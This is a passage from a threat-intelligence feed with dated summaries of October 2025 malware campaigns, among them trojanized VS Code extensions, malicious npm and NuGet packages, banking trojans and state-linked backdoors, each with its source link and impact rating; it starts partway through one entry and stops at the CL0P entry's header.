Summary:: Researchers at Koi Security have identified a coordinated malware campaign dubbed TigerJack, which systematically targets software developers through trojanized Visual Studio Code and OpenVSX extensions. Active since early 2025, TigerJack’s operation leverages multiple malicious extensions that impersonate legitimate development utilities, enabling the theft of proprietary source code, credentials, and system resources. Once installed, these extensions secretly exfiltrate code, mine cryptocurrency, and establish remote control channels for persistent access. The campaign demonstrates a high degree of sophistication through tactics such as multi-account publishing, cross-market republishing, and the use of benign initial uploads followed by malicious updates to build user trust before compromise.

Source: https://www.koi.ai/blog/tiger-jack-malicious-vscode-extensions-stealing-code

Intel Source:: Securelist (Kaspersky)

Intel Name:: AdaptixC2_npm_Supply_Chain_Attack

Date of Scan:: 2025-10-24

Impact:: HIGH

Summary:: Researchers at Kaspersky have identified a malicious npm package delivering the AdaptixC2 post-exploitation framework, a tool comparable in capability to Cobalt Strike. The package, disguised as a legitimate proxy utility, was uploaded to the npm registry under the name “https-proxy-utils” and automatically executed a payload after installation. AdaptixC2 is designed to operate across Windows, macOS, and Linux systems, using techniques such as DLL sideloading, autorun persistence, and temporary directory execution to deploy its implant. Once active, the framework provides attackers with full remote control, command execution, file and process management, and persistence mechanisms. The campaign underscores a broader trend of threat actors weaponizing trusted open-source ecosystems like npm for initial access and post-exploitation activities. This mirrors earlier incidents such as the Sha-Hulud worm campaign, reflecting a sustained increase in the abuse of public software repositories to infiltrate developer environments and downstream users.

Source: https://securelist.com/adaptixc2-agent-found-in-an-npm-package/117784/

Intel Source:: Securelist

Intel Name:: Maverick_Banking_Trojan_Distribute_WhatsApp

Date of Scan:: 2025-10-24

Impact:: MEDIUM

Summary:: Researchers at Securelist have identified a large-scale malware campaign in Brazil distributing a new banking Trojan dubbed Maverick through malicious LNK files delivered via WhatsApp. The infection chain employs multiple obfuscated .NET loaders that utilize techniques such as control flow flattening and string encryption to conceal their activity before deploying the final banking payload. Once installed, Maverick automates WhatsApp Web to message victims’ contacts, helping it spread further, and runs a separate agent focused on stealing banking information from specific browsers used in Brazil. The malware features remote control, keylogging, screen capture, browser manipulation, and secure communication over a WebSocket-based C2 channel. It maintains persistence through PowerShell scripts and Startup folder entries. The campaign exhibits notable similarities to the earlier Coyote banking Trojan, including the use of encrypted configurations and a focus on financial theft and session hijacking targeting Brazilian users.

Source: https://securelist.com/maverick-banker-distributing-via-whatsapp/117715/

Intel Source:: Resecurity

Intel Name:: F5_BIG_IP_Breach_Enables_UNC5221_BRICKSTORM_Attack

Date of Scan:: 2025-10-23

Impact:: HIGH

Summary:: Resecurity researchers have reported that the China-nexus threat actor UNC5221 is conducting state-sponsored cyber campaigns using a backdoor known as BRICKSTORM, following a confirmed F5 Networks breach that exposed BIG-IP source code and vulnerability data. The breach, disclosed under U.S. Department of Justice authorization, was kept confidential until October 2025 due to national security concerns. Attackers maintained persistence within F5’s environment for at least 12 months, indicating a sophisticated, long-term compromise. BRICKSTORM, a Go-based ELF implant designed for network appliances with restricted userland environments, supports TLS-encrypted WebSocket C2, SOCKS-style proxying, and multipart/form-data exfiltration to blend with normal web traffic. Its use of Yamux multiplexing enables concurrent command channels over a single TLS session, enhancing stealth and efficiency. The analysis revealed credential-harvesting servlet filters and systemd-based persistence mechanisms, with activity aligning to multiple MITRE ATT&CK techniques such as exploitation of public-facing applications, protocol tunneling, and encrypted C2.

Source: https://www.resecurity.com/blog/article/f5-big-ip-source-code-leak-tied-to-state-linked-campaigns-using-brickstorm-backdoor

Intel Source:: Picus Security

Intel Name:: Cavalry_Werewolf_FoalShell_and_StallionRAT_Campaign

Date of Scan:: 2025-10-23

Impact:: HIGH

Summary:: Researchers at Picus Security have identified an advanced campaign by the threat group Cavalry Werewolf (also tracked as YoroTrooper and Silent Lynx), active between May and August 2025, targeting Russia’s public sector and key industries including energy, mining, and manufacturing. The group leveraged trusted-relationship spear-phishing emails masquerading as official Kyrgyz government correspondence to deliver custom malware payloads. Two primary tools were observed: FoalShell, a multi-language reverse shell written in C#, C++, and Go, and StallionRAT, a Telegram-controlled remote access trojan developed in multiple languages including Go, PowerShell, and Python. FoalShell enables command execution through concealed command-line processes, while StallionRAT facilitates exfiltration, file manipulation, and remote command execution via Telegram-based command-and-control channels.

Source: https://www.picussecurity.com/resource/blog/cavalry-werewolf-apt

Intel Source:: Group IB

Intel Name:: MuddyWater_Delivers_Phoenix_v4_in_MENA_Campaign

Date of Scan:: 2025-10-23

Impact:: HIGH

Summary:: Researchers at Group-IB observed that the Iran-linked APT group MuddyWater conducted an advanced phishing campaign targeting over 100 government and international organizations across the Middle East and North Africa (MENA) region, delivering the Phoenix v4 backdoor malware. The operation exploited a compromised mailbox accessed via NordVPN, enabling threat actors to send credible phishing emails containing malicious Microsoft Word attachments. Once victims enabled macros, a VBA-based loader called FakeUpdate deployed the Phoenix v4 payload, which established persistence and communicated with the C2 domain. Also, identified custom remote management tools (Action1, PDQ) and a browser credential stealer (Chromium_Stealer) hosted on the same C2, highlighting a modular toolkit for espionage and remote administration. It is showing Phoenix v4 employs COM-based persistence, modified registry keys, and WinHTTP network communications, consistent with MuddyWater’s known tradecraft. Targeting was heavily focused on embassies, diplomatic, and foreign-affairs organizations (79%), underscoring geopolitical espionage motives. The group’s infrastructure, hosted on NameCheap ASN and obscured through Cloudflare and NordVPN nodes in France, was active for about five days before being taken down.

Source: https://www.group-ib.com/blog/muddywater-espionage/

Intel Source:: Splunk

Intel Name:: Weaponized_MSIX_Packages

Date of Scan:: 2025-10-23

Impact:: HIGH

Summary:: Researchers at Splunk Threat Research Team have identified an emerging trend in which adversaries are exploiting Microsoft’s MSIX application packaging format to deliver and conceal malicious payloads. Originally designed to enhance Windows app deployment security through signing, validation, and sandboxing, MSIX is now being repurposed by threat actors as a trusted container for malware delivery. Attackers have adapted the format into a Loader-as-a-Service model, selling pre-configured MSIX-based loaders that can evade traditional security controls and deliver remote access tools. These malicious packages frequently appear legitimately signed or developer-certified, enabling them to bypass SmartScreen and Windows Defender checks. Once executed, they allow adversaries to establish persistence, escalate privileges through full-trust package installations, and deploy secondary payloads such as remote access trojans.

Source: https://www.splunk.com/en_us/blog/security/msix-weaponization-threat-detection-splunk.html

Intel Source:: Socket

Intel Name:: NetHereum_Malicious_NuGet_Typosquat_Attack

Date of Scan:: 2025-10-22

Impact:: HIGH

Summary:: Researchers at Socket Threat Research identified a malicious typosquat campaign on the NuGet package ecosystem that impersonated the legitimate Nethereum library used for Ethereum wallet and transaction operations. The threat actor used a homograph attack by replacing a Latin character with a Cyrillic equivalent to create a nearly identical package name, allowing the malicious library to blend seamlessly into developer environments. Once installed, the trojanized code executed obfuscated routines designed to transmit sensitive wallet-related data to an external command-and-control endpoint. The malware leveraged legitimate-looking namespaces and class structures to evade detection and function normally within development workflows, exfiltrating private keys, mnemonics, and signing materials without interrupting visible operations.

Source: https://socket.dev/blog/malicious-nuget-packages-typosquat-nethereum-to-exfiltrate-wallet-keys?utm_medium=feed

Intel Source:: Seqrite Labs

Intel Name:: CAPI_Backdoor_DOTNET_Stealer_Targeting_Russia

Date of Scan:: 2025-10-22

Impact:: HIGH

Summary:: Researchers at Seqrite Labs have identified a targeted cyber campaign directed against the Russian automotive and e-commerce sectors, leveraging a previously unknown .NET-based malware dubbed CAPI Backdoor. The campaign began in early October 2025 and was initiated through spear-phishing emails containing ZIP archives that delivered a malicious LNK file and a decoy tax document designed to appear legitimate to Russian employees. Once executed, the malware deployed a .NET DLL implant that enabled data theft, remote command execution, and persistent access. CAPI Backdoor demonstrates the ability to collect browser credentials, capture screenshots, and exfiltrate information while maintaining communication with its command infrastructure using standard network ports to blend with normal traffic.

Source: https://www.seqrite.com/blog/seqrite-capi-backdoor-dotnet-stealer-russian-auto-commerce-oct-2025/

Intel Source:: ASEC

Intel Name:: HaiBot_Target_Linux_SSH_Server

Date of Scan:: 2025-10-22

Impact:: MEDIUM

Summary:: ASEC researchers have observed a significant increase in brute-force attacks and malware activity targeting Linux SSH servers. The HaiBot, a malware that activates after attackers gain SSH access and execute automated scripts to download its source code, compile it with gcc, and run it directly on the compromised host. After deployment, HaiBot establishes communication with a command server and regularly checking for new instructions. When triggered, it launches UDP flood attacks, sending NULL bytes or repetitive character streams to overwhelm victim systems. The malware relies on plain HTTP for C2 and contains a Vietnamese-language string in its parameters, indicating that the developer may be Vietnamese—though attribution remains unconfirmed. Overall, HaiBot represents a low-complexity but effective DDoS bot that quickly weaponizes compromised Linux systems.

Source: https://asec.ahnlab.com/en/90569/

Intel Source:: Elastic Security Labs

Intel Name:: NightMARE_Tool_Aids_Lumma_Stealer_Analysis

Date of Scan:: 2025-10-21

Impact:: MEDIUM

Summary:: Researchers at Elastic Security Labs have released NightMARE v0.16, a Python-based reverse engineering and emulation framework designed to automate malware configuration extraction and analysis. Demonstrated against Lumma Stealer (LummaC2), a credential-stealing malware still active in global campaigns despite a May 2025 takedown—NightMARE helps overcome Lumma’s use of control flow obfuscation and ChaCha20-based encryption that complicates static analysis. The framework integrates Rizin for disassembly and Unicorn for emulation, allowing analysts to execute cryptographic routines directly from the malware binary without manual reimplementation. In Elastic’s example, analysts successfully recovered Lumma’s encrypted C2 configuration by identifying keys, locating the ChaCha20 context, and invoking the embedded decryption routine within the emulated environment. The decrypted infrastructure revealed active domains, all aligning with previously observed Lumma operations.

Source: https://www.elastic.co/security-labs/nightmare-on-0xelm-street

Intel Source:: ASEC

Intel Name:: XiebroC2_MS_SQL_Server_Intrusions

Date of Scan:: 2025-10-21

Impact:: HIGH

Summary:: Researchers at AhnLab Security Intelligence Center (ASEC) have identified ongoing malicious activity in Q3 2025 targeting Windows-based MS-SQL servers through credential compromise and post-exploitation abuse. Attackers leveraged CLR Shell and Potato-type malware to gain execution and escalate privileges, followed by the deployment of command-and-control frameworks such as XiebroC2, CobaltStrike, and Meterpreter. The open-source XiebroC2 framework enables adversaries to perform remote operations including data collection, process manipulation, and defense evasion across compromised servers. In observed cases, attackers utilized PowerShell and JuicyPotato to achieve lateral movement and privilege escalation, while additional tools such as Proxyware and CoinMiner were used to monetize infected environments through bandwidth theft or cryptocurrency mining.

Source: https://asec.ahnlab.com/en/90572/

Intel Source:: Hunt.IO

Intel Name:: Odyssey_Stealer_Fake_macOS_Tools_Target_Developers

Date of Scan:: 2025-10-21

Impact:: HIGH

Summary:: Researchers at Hunt.io have identified a coordinated campaign leveraging Odyssey Stealer and AMOS (Atomic macOS Stealer) to target macOS developers through fake software download sites impersonating trusted tools such as Homebrew, TradingView, and LogMeIn. The operation exploits developer trust by using social engineering and malicious installation commands disguised as legitimate terminal actions. Once executed, the payloads install stealers designed to exfiltrate browser data, cryptocurrency credentials, and system information. The campaign’s infrastructure shows organized reuse of servers, SSL certificates, and domain registrations, suggesting a mature operational backend maintained over multiple iterations. The malware demonstrates advanced evasion techniques, including AppleScript-based anti-analysis checks, layered shell execution, and privilege escalation attempts that bypass macOS Gatekeeper protections.

Source: https://hunt.io/blog/macos-odyssey-amos-malware-campaign

Intel Source:: Proof Point

Intel Name:: TA585_MonsterV2_Malware_Operations

Date of Scan:: 2025-10-20

Impact:: HIGH

Summary:: Researchers at Proofpoint have identified a new cybercriminal actor, TA585, conducting sophisticated malware campaigns distributing the MonsterV2 remote access trojan (RAT), stealer, and loader. The group operates its own infrastructure and employs unique web injection and filtering techniques that enable realistic phishing and malware delivery operations. TA585’s activity began in early 2025, using U.S. government-themed lures impersonating the IRS and Small Business Administration to compromise victims, primarily within finance and accounting sectors. The infection chain leverages fake verification pages and PowerShell-based payload execution through a tactic Proofpoint refers to as “ClickFix.” Once deployed, MonsterV2 provides full-featured capabilities, including credential and data theft, HVNC-based remote access, and command execution.

Source: https://www.proofpoint.com/us/blog/threat-insight/when-monster-bytes-tracking-ta585-and-its-arsenal

Intel Source:: Socket

Intel Name:: Discord_C2_in_Open_Source_Packages

Date of Scan:: 2025-10-20

Impact:: MEDIUM

Summary:: Researchers at Socket have identified a cross-ecosystem campaign in which threat actors weaponize Discord webhooks as command-and-control (C2) channels across the npm, PyPI, and RubyGems package repositories. These malicious packages were designed to steal developer and system data by embedding hard-coded webhook URLs into installation or execution routines. Upon execution, the malware exfiltrates environment variables, configuration files, and credentials to Discord-controlled endpoints using encrypted HTTPS traffic. This technique allows attackers to avoid maintaining dedicated infrastructure while blending exfiltration activity within legitimate Discord traffic. The malicious code samples observed demonstrate consistent tactics such as targeting configuration and credential files, modifying setup or install scripts for persistence, and using multilingual decoys to obscure intent—suggesting a single actor or tightly linked group.

Source: https://socket.dev/blog/weaponizing-discord-for-command-and-control?utm_medium=feed

Intel Source:: Qianxin X Lab

Intel Name:: StealthServer_APT36_Cross_Platform_Backdoor

Date of Scan:: 2025-10-20

Impact:: HIGH

Summary:: Researchers at Qianxin X Lab have uncovered StealthServer, a Golang‑based dual‑platform backdoor active since July 2025 against Windows and Linux systems that uses modular C2 over TCP, HTTP, and WebSocket and employs anti‑analysis (junk code obfuscation, anti‑VM) and traffic‑blending with benign domains, attribution indicators (.desktop Linux loaders, government‑themed phishing lures, and C2 overlaps) point to APT36, a Pakistan‑linked espionage actor targeting South Asian defense and research organizations—while the malware delivers decoy conference/procurement documents to mask malicious activity, supports encrypted JSON C2 for remote command execution and file exfiltration, uses OS‑specific persistence (registry keys and PowerShell LNK autostarts on Windows, systemd services and crontab on Linux), has multiple identified variants (Windows V1–V3, Linux V1–V2), and leverages distributed hosting across providers such as ALEXHOST SRL, IP Connect Inc, and Shinjiru Technology to provide resilient C2 infrastructure.

Source: https://blog.xlab.qianxin.com/apt-stealthserver-cn/

Intel Source:: Mcafee

Intel Name:: Astaroth_Trojan_GitHub_Based_C2_Resilience

Date of Scan:: 2025-10-19

Impact:: HIGH

Summary:: Researchers at McAfee Labs have identified a new campaign involving the Astaroth banking trojan, which leverages GitHub repositories to enhance its command-and-control (C2) resilience. Astaroth, known for targeting banking users in South America—particularly Brazil employs phishing emails containing malicious ZIP files that deliver obfuscated JavaScript downloaders disguised as LNK shortcuts. Once executed, these scripts use mshta.exe to retrieve an AutoIt loader, an encrypted payload, and configuration files from multiple online sources. The payload, written in Delphi, exhibits strong anti-analysis and sandbox-evasion techniques, including system locale checks and shutdown behavior when debugging tools are detected. Astaroth maintains persistence through startup folder entries and exfiltrates credentials obtained via keylogging and browser session hijacking. Its novel approach to C2 infrastructure involves using Ngrok reverse proxies and GitHub-hosted steganographic images to update configuration data every few hours, enabling rapid recovery from takedowns.

Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/astaroth-banking-trojan-abusing-github-for-resilience/

Intel Source:: Socket

Intel Name:: Malicious_NPM_Packages_Targets_over_135_Organisation

Date of Scan:: 2025-10-18

Impact:: MEDIUM

Summary:: Researchers at Socket have uncovered a coordinated phishing operation that leverages the npm registry and unpkg CDN to host malicious redirector scripts. The threat actors published approximately 175 deceptive npm packages, which collectively downloaded over 26,000 times, functioning as delivery infrastructure for phishing campaigns rather than distributing executable malware. These campaigns employ HTML lure files often disguised as purchase orders or project documents that dynamically load JavaScript redirectors from the CDN, leading victims to Microsoft 365-themed phishing pages designed to harvest credentials. Each lure is individually customized with victim-specific details such as the organization’s name and email address, enabling attackers to track and manage targeted campaigns. The campaign primarily targets the industrial, technology, and energy sectors across Western Europe with additional activity in Nordic and Asia-Pacific regions. Its ultimate goal is to enable Business Email Compromise (BEC) through credential theft, exploiting the trusted npm ecosystem for large-scale phishing attacks.

Source: https://socket.dev/blog/175-malicious-npm-packages-host-phishing-infrastructure?utm_medium=feed

Intel Source:: Fortinet

Intel Name:: New_Stealit_Campaign_Abuses_NodeJS

Date of Scan:: 2025-10-18

Impact:: LOW

Summary:: Researchers at FortiGuard have identified a renewed StealIt malware operation that has shifted from Electron-based builds to a single-executable NodeJS format. The threat actor now markets StealIt as a commercial service, offering both Windows and Android versions with lifetime subscriptions. The malware is distributed through fake installers on file-sharing sites and social media. Once installed, it can steal files and credentials, control the victim’s devices, and run remote commands. It also features live screen and webcam streaming, file collection, persistence mechanisms, and fake alerts to deceive users. To evade analysis and detection, StealIt uses multistage obfuscation along with anti-VM, anti-debug, and process-checking techniques. The client even includes a ransom-chat feature, so attackers could use it for extortion as well as data theft.

Source: https://www.fortinet.com/blog/threat-research/stealit-campaign-abuses-nodejs-single-executable-application

Intel Source:: BI ZONE

Intel Name:: Cavalry_Werewolf_Public_Sector_Phishing_Campaigns

Date of Scan:: 2025-10-17

Impact:: HIGH

Summary:: Researchers at BI.ZONE have identified a series of targeted phishing operations conducted by the threat actor known as Cavalry Werewolf between May and August 2025. The campaigns exploited trusted relationships by leveraging legitimate or compromised Kyrgyz government email accounts to send lures to Russian ministries and enterprises. These emails were crafted with document-themed attachments designed to deliver custom malware, notably FoalShell and StallionRAT, enabling remote access, persistence, and data theft. The actor demonstrated both intent and capability to undermine Russian public institutions, with specific ministries of Economy, Culture, and Sport among the victims. Beyond Russia, preparations for operations were also noted in Tajikistan and the Middle East, indicating a broader regional scope.

Source: https://bi.zone/eng/expertise/blog/cavalry-werewolf-atakuet-rossiyu-cherez-doveritelnye-otnosheniya-mezhdu-gosudarstvami/

Intel Source:: Cofense

Intel Name:: MAC_Spoofer_Malicious_Chrome_Extension_Scam

Date of Scan:: 2025-10-17

Impact:: MEDIUM

Summary:: Researchers at Cofense Phishing Defense Center have identified a phishing campaign distributing a malicious Chrome extension named “MAC Spoofer,” which masquerades as a privacy tool promising anonymity and a $50,000 prize incentive. The campaign uses social engineering through email attachments, instructing recipients to manually install the extension and follow a guide that appears legitimate. Once installed, the extension captures user credentials during login attempts to financial and non-financial websites, transmitting them to attacker-controlled infrastructure. The fake extension claims to randomize a user’s MAC address but contains no code supporting this functionality. Instead, it leverages legitimate libraries to conceal its true purpose of credential theft. The campaign demonstrates a shift from conventional phishing methods, exploiting users’ familiarity with browser extensions and sideloading features to achieve persistence and data exfiltration.

Source: https://cofense.com/blog/privacy%E2%80%9D-and-prizes%E2%80%9D-rewards-from-a-malicious-browser-extension

Intel Source:: Google Threat Intelligence (Mandiant)

Intel Name:: UNC5342_Using_Blockchain_for_Malware_Delivery

Date of Scan:: 2025-10-17

Impact:: HIGH

Summary:: Researchers at Google Threat Intelligence Group (Mandiant) have uncovered a novel malware delivery technique known as EtherHiding, used by North Korea–linked threat actor UNC5342 to support cryptocurrency theft and cyber-espionage. Active since February 2025, the group has incorporated EtherHiding into its ongoing Contagious Interview campaign, which targeting software and cryptocurrency developers through fake job interviews and malicious coding tasks. Victims are lured into downloading JavaScript packages containing the JADESNOW downloader, which then fetches a JavaScript variant of the INVISIBLEFERRET backdoor. EtherHiding leverages smart contracts on BNB Smart Chain and Ethereum to embed payloads, effectively transforming blockchain infrastructure into a resilient, decentralized C2 mechanism that evades takedown by using read-only blockchain calls like eth_call for stealthy, fileless retrieval without incurring gas fees. This technique supports multi-stage infections across Windows, macOS, and Linux, with the final INVISIBLEFERRET.JAVASCRIPT payload connecting over TCP port 3306 (MySQL) to exfiltrate credentials, host metadata, browser data, and crypto wallets such as MetaMask and Phantom.

Source: https://cloud.google.com/blog/topics/threat-intelligence/dprk-adopts-etherhiding/

Intel Source:: Seqrite

Intel Name:: Silk_Lure_DLL_Side_Loading_Espionage_Campaign

Date of Scan:: 2025-10-17

Impact:: HIGH

Summary:: Researchers at Seqrite Labs have identified an ongoing cyber-espionage operation dubbed “Silk Lure”, which leverages scheduled tasks and DLL side-loading techniques to deploy a remote access trojan known as ValleyRAT. The campaign uses a Chinese-language résumé decoy to socially engineer victims, primarily targeting individuals in financial technology, cryptocurrency, and trading platform sectors. Once the malicious shortcut file is executed, it triggers a PowerShell command chain that downloads and launches a VBScript, which establishes persistence via a Windows scheduled task. This persistence mechanism executes a loader binary that sideloads a malicious DLL, enabling covert delivery of the final payload. The malware exhibits advanced features such as system reconnaissance, anti-virtualization checks, and antivirus evasion through WMI queries and process termination.

Source: https://www.seqrite.com/blog/operation-silk-lure-scheduled-tasks-weaponized-for-dll-side-loading-drops-valleyrat/

Intel Source:: Zscaler

Intel Name:: Distribution_of_Trojanized_Ivanti_Pulse_Secure

Date of Scan:: 2025-10-16

Impact:: MEDIUM

Summary:: Researchers at Zscaler have identified an ongoing campaign that leverages SEO poisoning techniques to distribute a trojanized version of the Ivanti Pulse Secure VPN client. The attackers create deceptive websites that appear prominently in Bing search results and redirect users to attacker-controlled infrastructure. The malicious installer, digitally signed to appear legitimate, deploy weaponized DLLs designed to harvest saved VPN connection details from the Ivanti client’s configuration store. Additionally, the campaign employs referrer-based content switching, displaying benign content when accessed directly but delivering the malicious payload when reached via Bing. The attacker’s objective is to gain initial access via stolen VPN credentials to establish initial access, reconnaissance, lateral movement, and potentially ransomware deployment.

Source: https://www.zscaler.com/blogs/security-research/spoofed-ivanti-vpn-client-sites

Intel Source:: ISC.SANS

Intel Name:: Python_Infostealer_Clipboard_Image_Theft

Date of Scan:: 2025-10-16

Impact:: MEDIUM

Summary:: Researchers at ISC.SANS have identified a Python-based infostealer designed to capture and exfiltrate images copied to a system clipboard. The malware extends the functionality of traditional clipboard stealers, which typically focus on text or cryptocurrency data, by targeting image content shared between virtual and host environments. Using the Python ImageGrab library from the Pillow package, the infostealer retrieves clipboard images, converts them into standard formats, and transmits them to an attacker-controlled command-and-control channel over Telegram. The sample analyzed by SANS researchers included Vietnamese-language debug strings, suggesting a reused or regionally developed codebase. The malware operates at user privilege level and exploits shared clipboard functionality, enabling it to access host clipboard data from virtualized environments without elevated permissions.

Source: https://isc.sans.edu/diary/rss/32372

Intel Source:: Trend Micro

Intel Name:: Operation_Zero_Disco

Date of Scan:: 2025-10-16

Impact:: HIGH

Summary:: Trend Micro researchers have uncovered an exploitation of a Cisco SNMP vulnerability (CVE-2025-20352) to gain remote code execution on Cisco IOS XE-based switches. The affected devices include Cisco Catalyst 9400, 9300, and legacy 3750G series devices. Upon successful exploitation, the attackers deploy a Linux rootkit designed to maintain long-term access and conceal malicious activity. The implant establishes a UDP-based backdoor with a custom controller capable of disabling or deleting logs, bypassing authentication and terminal access controls, hiding configuration changes, and modifying timestamps to obscure evidence of compromise. In addition, the attackers use ARP spoofing from compromised Cisco shells to impersonate trusted hosts and bypass internal firewalls, enabling cross-VLAN routing and extensive lateral movement from a single core switch. Furthermore, the rootkit can inject a universal backdoor password by hooking into low-level authentication routines within the device’s memory and can conceal sensitive information to evade detection and maintain persistence.

Source: https://www.trendmicro.com/en_us/research/25/j/operation-zero-disco-cisco-snmp-vulnerability-exploit.html

Intel Source:: Sekoia

Intel Name:: PolarEdge_Backdoor

Date of Scan:: 2025-10-15

Impact:: MEDIUM

Summary:: Sekoia researchers have identified PolarEdge, a Linux backdoor targeting ARM and x86 NAS devices that implements a custom binary protocol over TLS to enable remote command execution. The implant deployed after initial exploitation activity and then fingerprints the host and reaches out to C2 using a simple binary protocol over TLS and supports on demand payload execute and download, operate in a connect-back mode to fetch files from an operator-specified host, and run a debug mode to update configuration. The malware uses anti-analysis measures, including section encryption, an affine cipher for strings, and process masquerading. It prefers stealth over persistence, re-executing via a child process instead of installing durable startup entries. The operator’s objective is to maintain control of compromised edge devices for further tasking, rather than immediate destruction.

Source: https://blog.sekoia.io/polaredge-backdoor-qnap-cve-2023-20118-analysis/

Intel Source:: Polyswarm

Intel Name:: EvilAI_Malware_Campaign

Date of Scan:: 2025-10-15

Impact:: MEDIUM

Summary:: The EvilAI malware campaign is a global cyber operation that leverages AI-generated code and digitally signed fraudulent applications to infiltrate systems across critical sectors, including manufacturing, government, and healthcare. These malicious applications masquerade as legitimate productivity tools and are distributed through fake websites, SEO manipulation, and social media promotions. Once installed, EvilAI deploys an obfuscated JavaScript payload that executes within Node.js, establishes persistence via scheduled tasks and registry modifications, and communicates securely with its C2 servers using AES-256-CBC encryption. it further exploits Windows Management Instrumentation (WMI) to steal browser credentials by duplicating sensitive data files from Google Chrome and Microsoft Edge. EvilAI’s advanced modular architecture allows it to download files, modify registry entries, execute processes, and potentially deploy additional payloads.

Source: https://blog.polyswarm.io/evilai

Intel Source:: Reliaquest

Intel Name:: Flax_Typhoon_Exploiting_ArcGIS_Server

Date of Scan:: 2025-10-15

Impact:: MEDIUM

Summary:: Researchers at ReliaQuest discovered that the China-linked APT group Flax Typhoon (also known as Ethereal Panda) compromised an ArcGIS Server by exploiting a legitimate ArcGIS Server Object Extension (SOE). This allowed the attackers to covertly execute commands and move laterally within the network while blending their activity with normal traffic without using traditional malware. For persistence, they installed a renamed VPN component as a Windows service that automatically started at boot, allowing long-term remote access without deploying custom malware. Once inside, the threat actors conducted environment reconnaissance, credential theft, and file collection including, Active Directory data, and other sensitive files. The compromise is particularly impactful because the targeted ArcGIS Server acted as a gateway to internal systems, posing a serious risk to critical geospatial, planning, and emergency-management workflows.

Source: https://reliaquest.com/blog/threat-spotlight-inside-flax-typhoons-arcgis-compromise

Intel Source:: Snyk

Intel Name:: Beamglea_Phish_npm_CDN_Credential_Theft

Date of Scan:: 2025-10-15

Impact:: MEDIUM

Summary:: Researchers at Snyk identified a large-scale phishing operation that abuses the npm open-source ecosystem to deliver credential-harvesting scripts through trusted web infrastructure. Instead of the conventional method of compromising developers during package installation, the threat actors exploited npm’s automatic CDN service to serve phishing payloads directly to victims’ browsers. The campaign involved the automated creation of hundreds of low-content npm packages that, once published, were instantly mirrored on the unpkg content delivery network. These hosted scripts were embedded within phishing lures masquerading as invoices or security verification pages. The malicious JavaScript mimicked legitimate Cloudflare browser checks, redirected users to attacker-controlled login portals, and exfiltrated credentials while implementing anti-analysis measures to avoid inspection. Technical indicators from the campaign suggest a structured and scalable approach designed to bypass security filters by leveraging legitimate developer infrastructure.

Source: https://snyk.io/blog/phishing-campaign-leveraging-the-npm-ecosystem/

Intel Source:: ISC.SANS

Intel Name:: RedTail_Malware_SSH_Based_Cryptojacking_Campaign

Date of Scan:: 2025-10-15

Impact:: MEDIUM

Summary:: Researchers at ISC.SANS have identified ongoing cryptojacking activity attributed to the RedTail malware family, which targets Linux systems through brute-forced SSH access. First observed in early 2024, RedTail is designed to hijack CPU resources for Monero cryptocurrency mining while maintaining a low operational footprint to evade detection. Once attackers gain access, they deploy automated scripts to install the miner, remove competing processes, and implant their own SSH keys for persistent access. The malware also performs system discovery to confirm compatibility before execution and deletes traces to conceal its presence. RedTail communicates via outbound encrypted HTTPS traffic to remote servers, blending malicious activity within legitimate network flows.

Source: https://isc.sans.edu/diary/Guest+Diary+Building+Better+Defenses+RedTail+Observations+from+a+Honeypot/32312/

Intel Source:: Socket

Intel Name:: DPRK_Contagious_Interview_Campaign

Date of Scan:: 2025-10-14

Impact:: MEDIUM

Summary:: Researchers at Socket have uncovered a North Korean state-sponsored campaign, dubbed “Contagious Interview,” that abuses the npm registry to target developers. The operation begins with recruiter-themed social engineering on LinkedIn and related platforms, where developers in the Web3, cryptocurrency, and blockchain sectors are enticed with fake job opportunities and coding assignments. The threat actors leverage typosquatted or re-uploaded npm packages containing install-time scripts and loaders that execute during installation, enabling code execution on victim machines. These packages exploit npm lifecycle hooks and use impersonated maintainer accounts to evade detection and maintain persistence even after package takedowns. The campaign’s BeaverTail loader establishes HTTPS and WebSocket-based C2 channels, retrieving a secondary component named InvisibleFerret, which enables cross-platform operations on Windows, macOS, and Linux systems. The attackers’ primary objectives include credential and crypto-asset theft, reconnaissance of developer environments, and establishing persistent backdoor access for further exploitation.

Source: https://socket.dev/blog/north-korea-contagious-interview-campaign-338-malicious-npm-packages

Intel Source:: Darktrace

Intel Name:: Akira_SonicWall_VPN_Exploitation_Campaign

Date of Scan:: 2025-10-14

Impact:: HIGH

Summary:: Researchers at Darktrace have identified a targeted campaign by the Akira ransomware group exploiting SonicWall SSL VPN vulnerabilities between July and August 2025. The operation leveraged the previously disclosed flaw CVE-2024-40766 to gain unauthorized access to corporate networks. Following exploitation, the attackers conducted network reconnaissance, credential theft, and lateral movement using legitimate administrative protocols such as WinRM and RDP. Akira actors employed Kerberos authentication abuse and pass-the-hash techniques to escalate privileges and establish persistence within compromised environments. Subsequent stages involved data exfiltration and the deployment of ransomware payloads. Darktrace’s Managed Detection and Response team contained the intrusion through automated blocking actions, preventing further propagation and encryption events

Source: https://www.darktrace.com/blog/inside-akiras-sonicwall-campaign-darktraces-detection-and-response

Intel Source:: TahirSec

Intel Name:: OceanLotus_Campaign_Targets_Critical_Infrastructure

Date of Scan:: 2025-10-13

Impact:: HIGH

Summary:: Researchers at TahirSec have analyzed a new OceanLotus (APT32/APT‑Q‑31) campaign deploying the Havoc Demon RAT, noting that the Vietnam‑linked actor—active since at least 2012 and previously focused on Chinese government, defense, energy, and research targets, has broadened operations across East and Southeast Asian critical infrastructure (including energy, healthcare, and information sectors), the campaign using DLL hollowing and VEH exception handling to stealthily deploy a shellcode payload (shellcode.dll) from a loader (msmpi.dll) that establishes persistence via the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftMPI and injects the payload through advapi32.dll, after which the RAT dynamically loads ntdll.dll, kernel32.dll, and iphlpapi.dll and employs API hashing for anti‑analysis, its C2 communicates over HTTPS POST to an IP, exfiltrating host identifiers and environment metadata (hostnames, usernames, IPs, process architecture, OS version) encrypted with AES‑256‑CTR, and the use of the open‑source Havoc Framework suggests OceanLotus is evolving toward more modular, framework‑based, and scalable post‑exploitation capabilities.

Source: https://mp.weixin.qq.com/s/rW_xSgKlV6r0_JXIjr97Rg

Intel Source:: Google Threat Intelligence (Mandiant)

Intel Name:: CL0P_Oracle_EBS_ZeroDay_Extortion_Attack

Date of Scan:: 2025-10-13

Impact:: HIGH

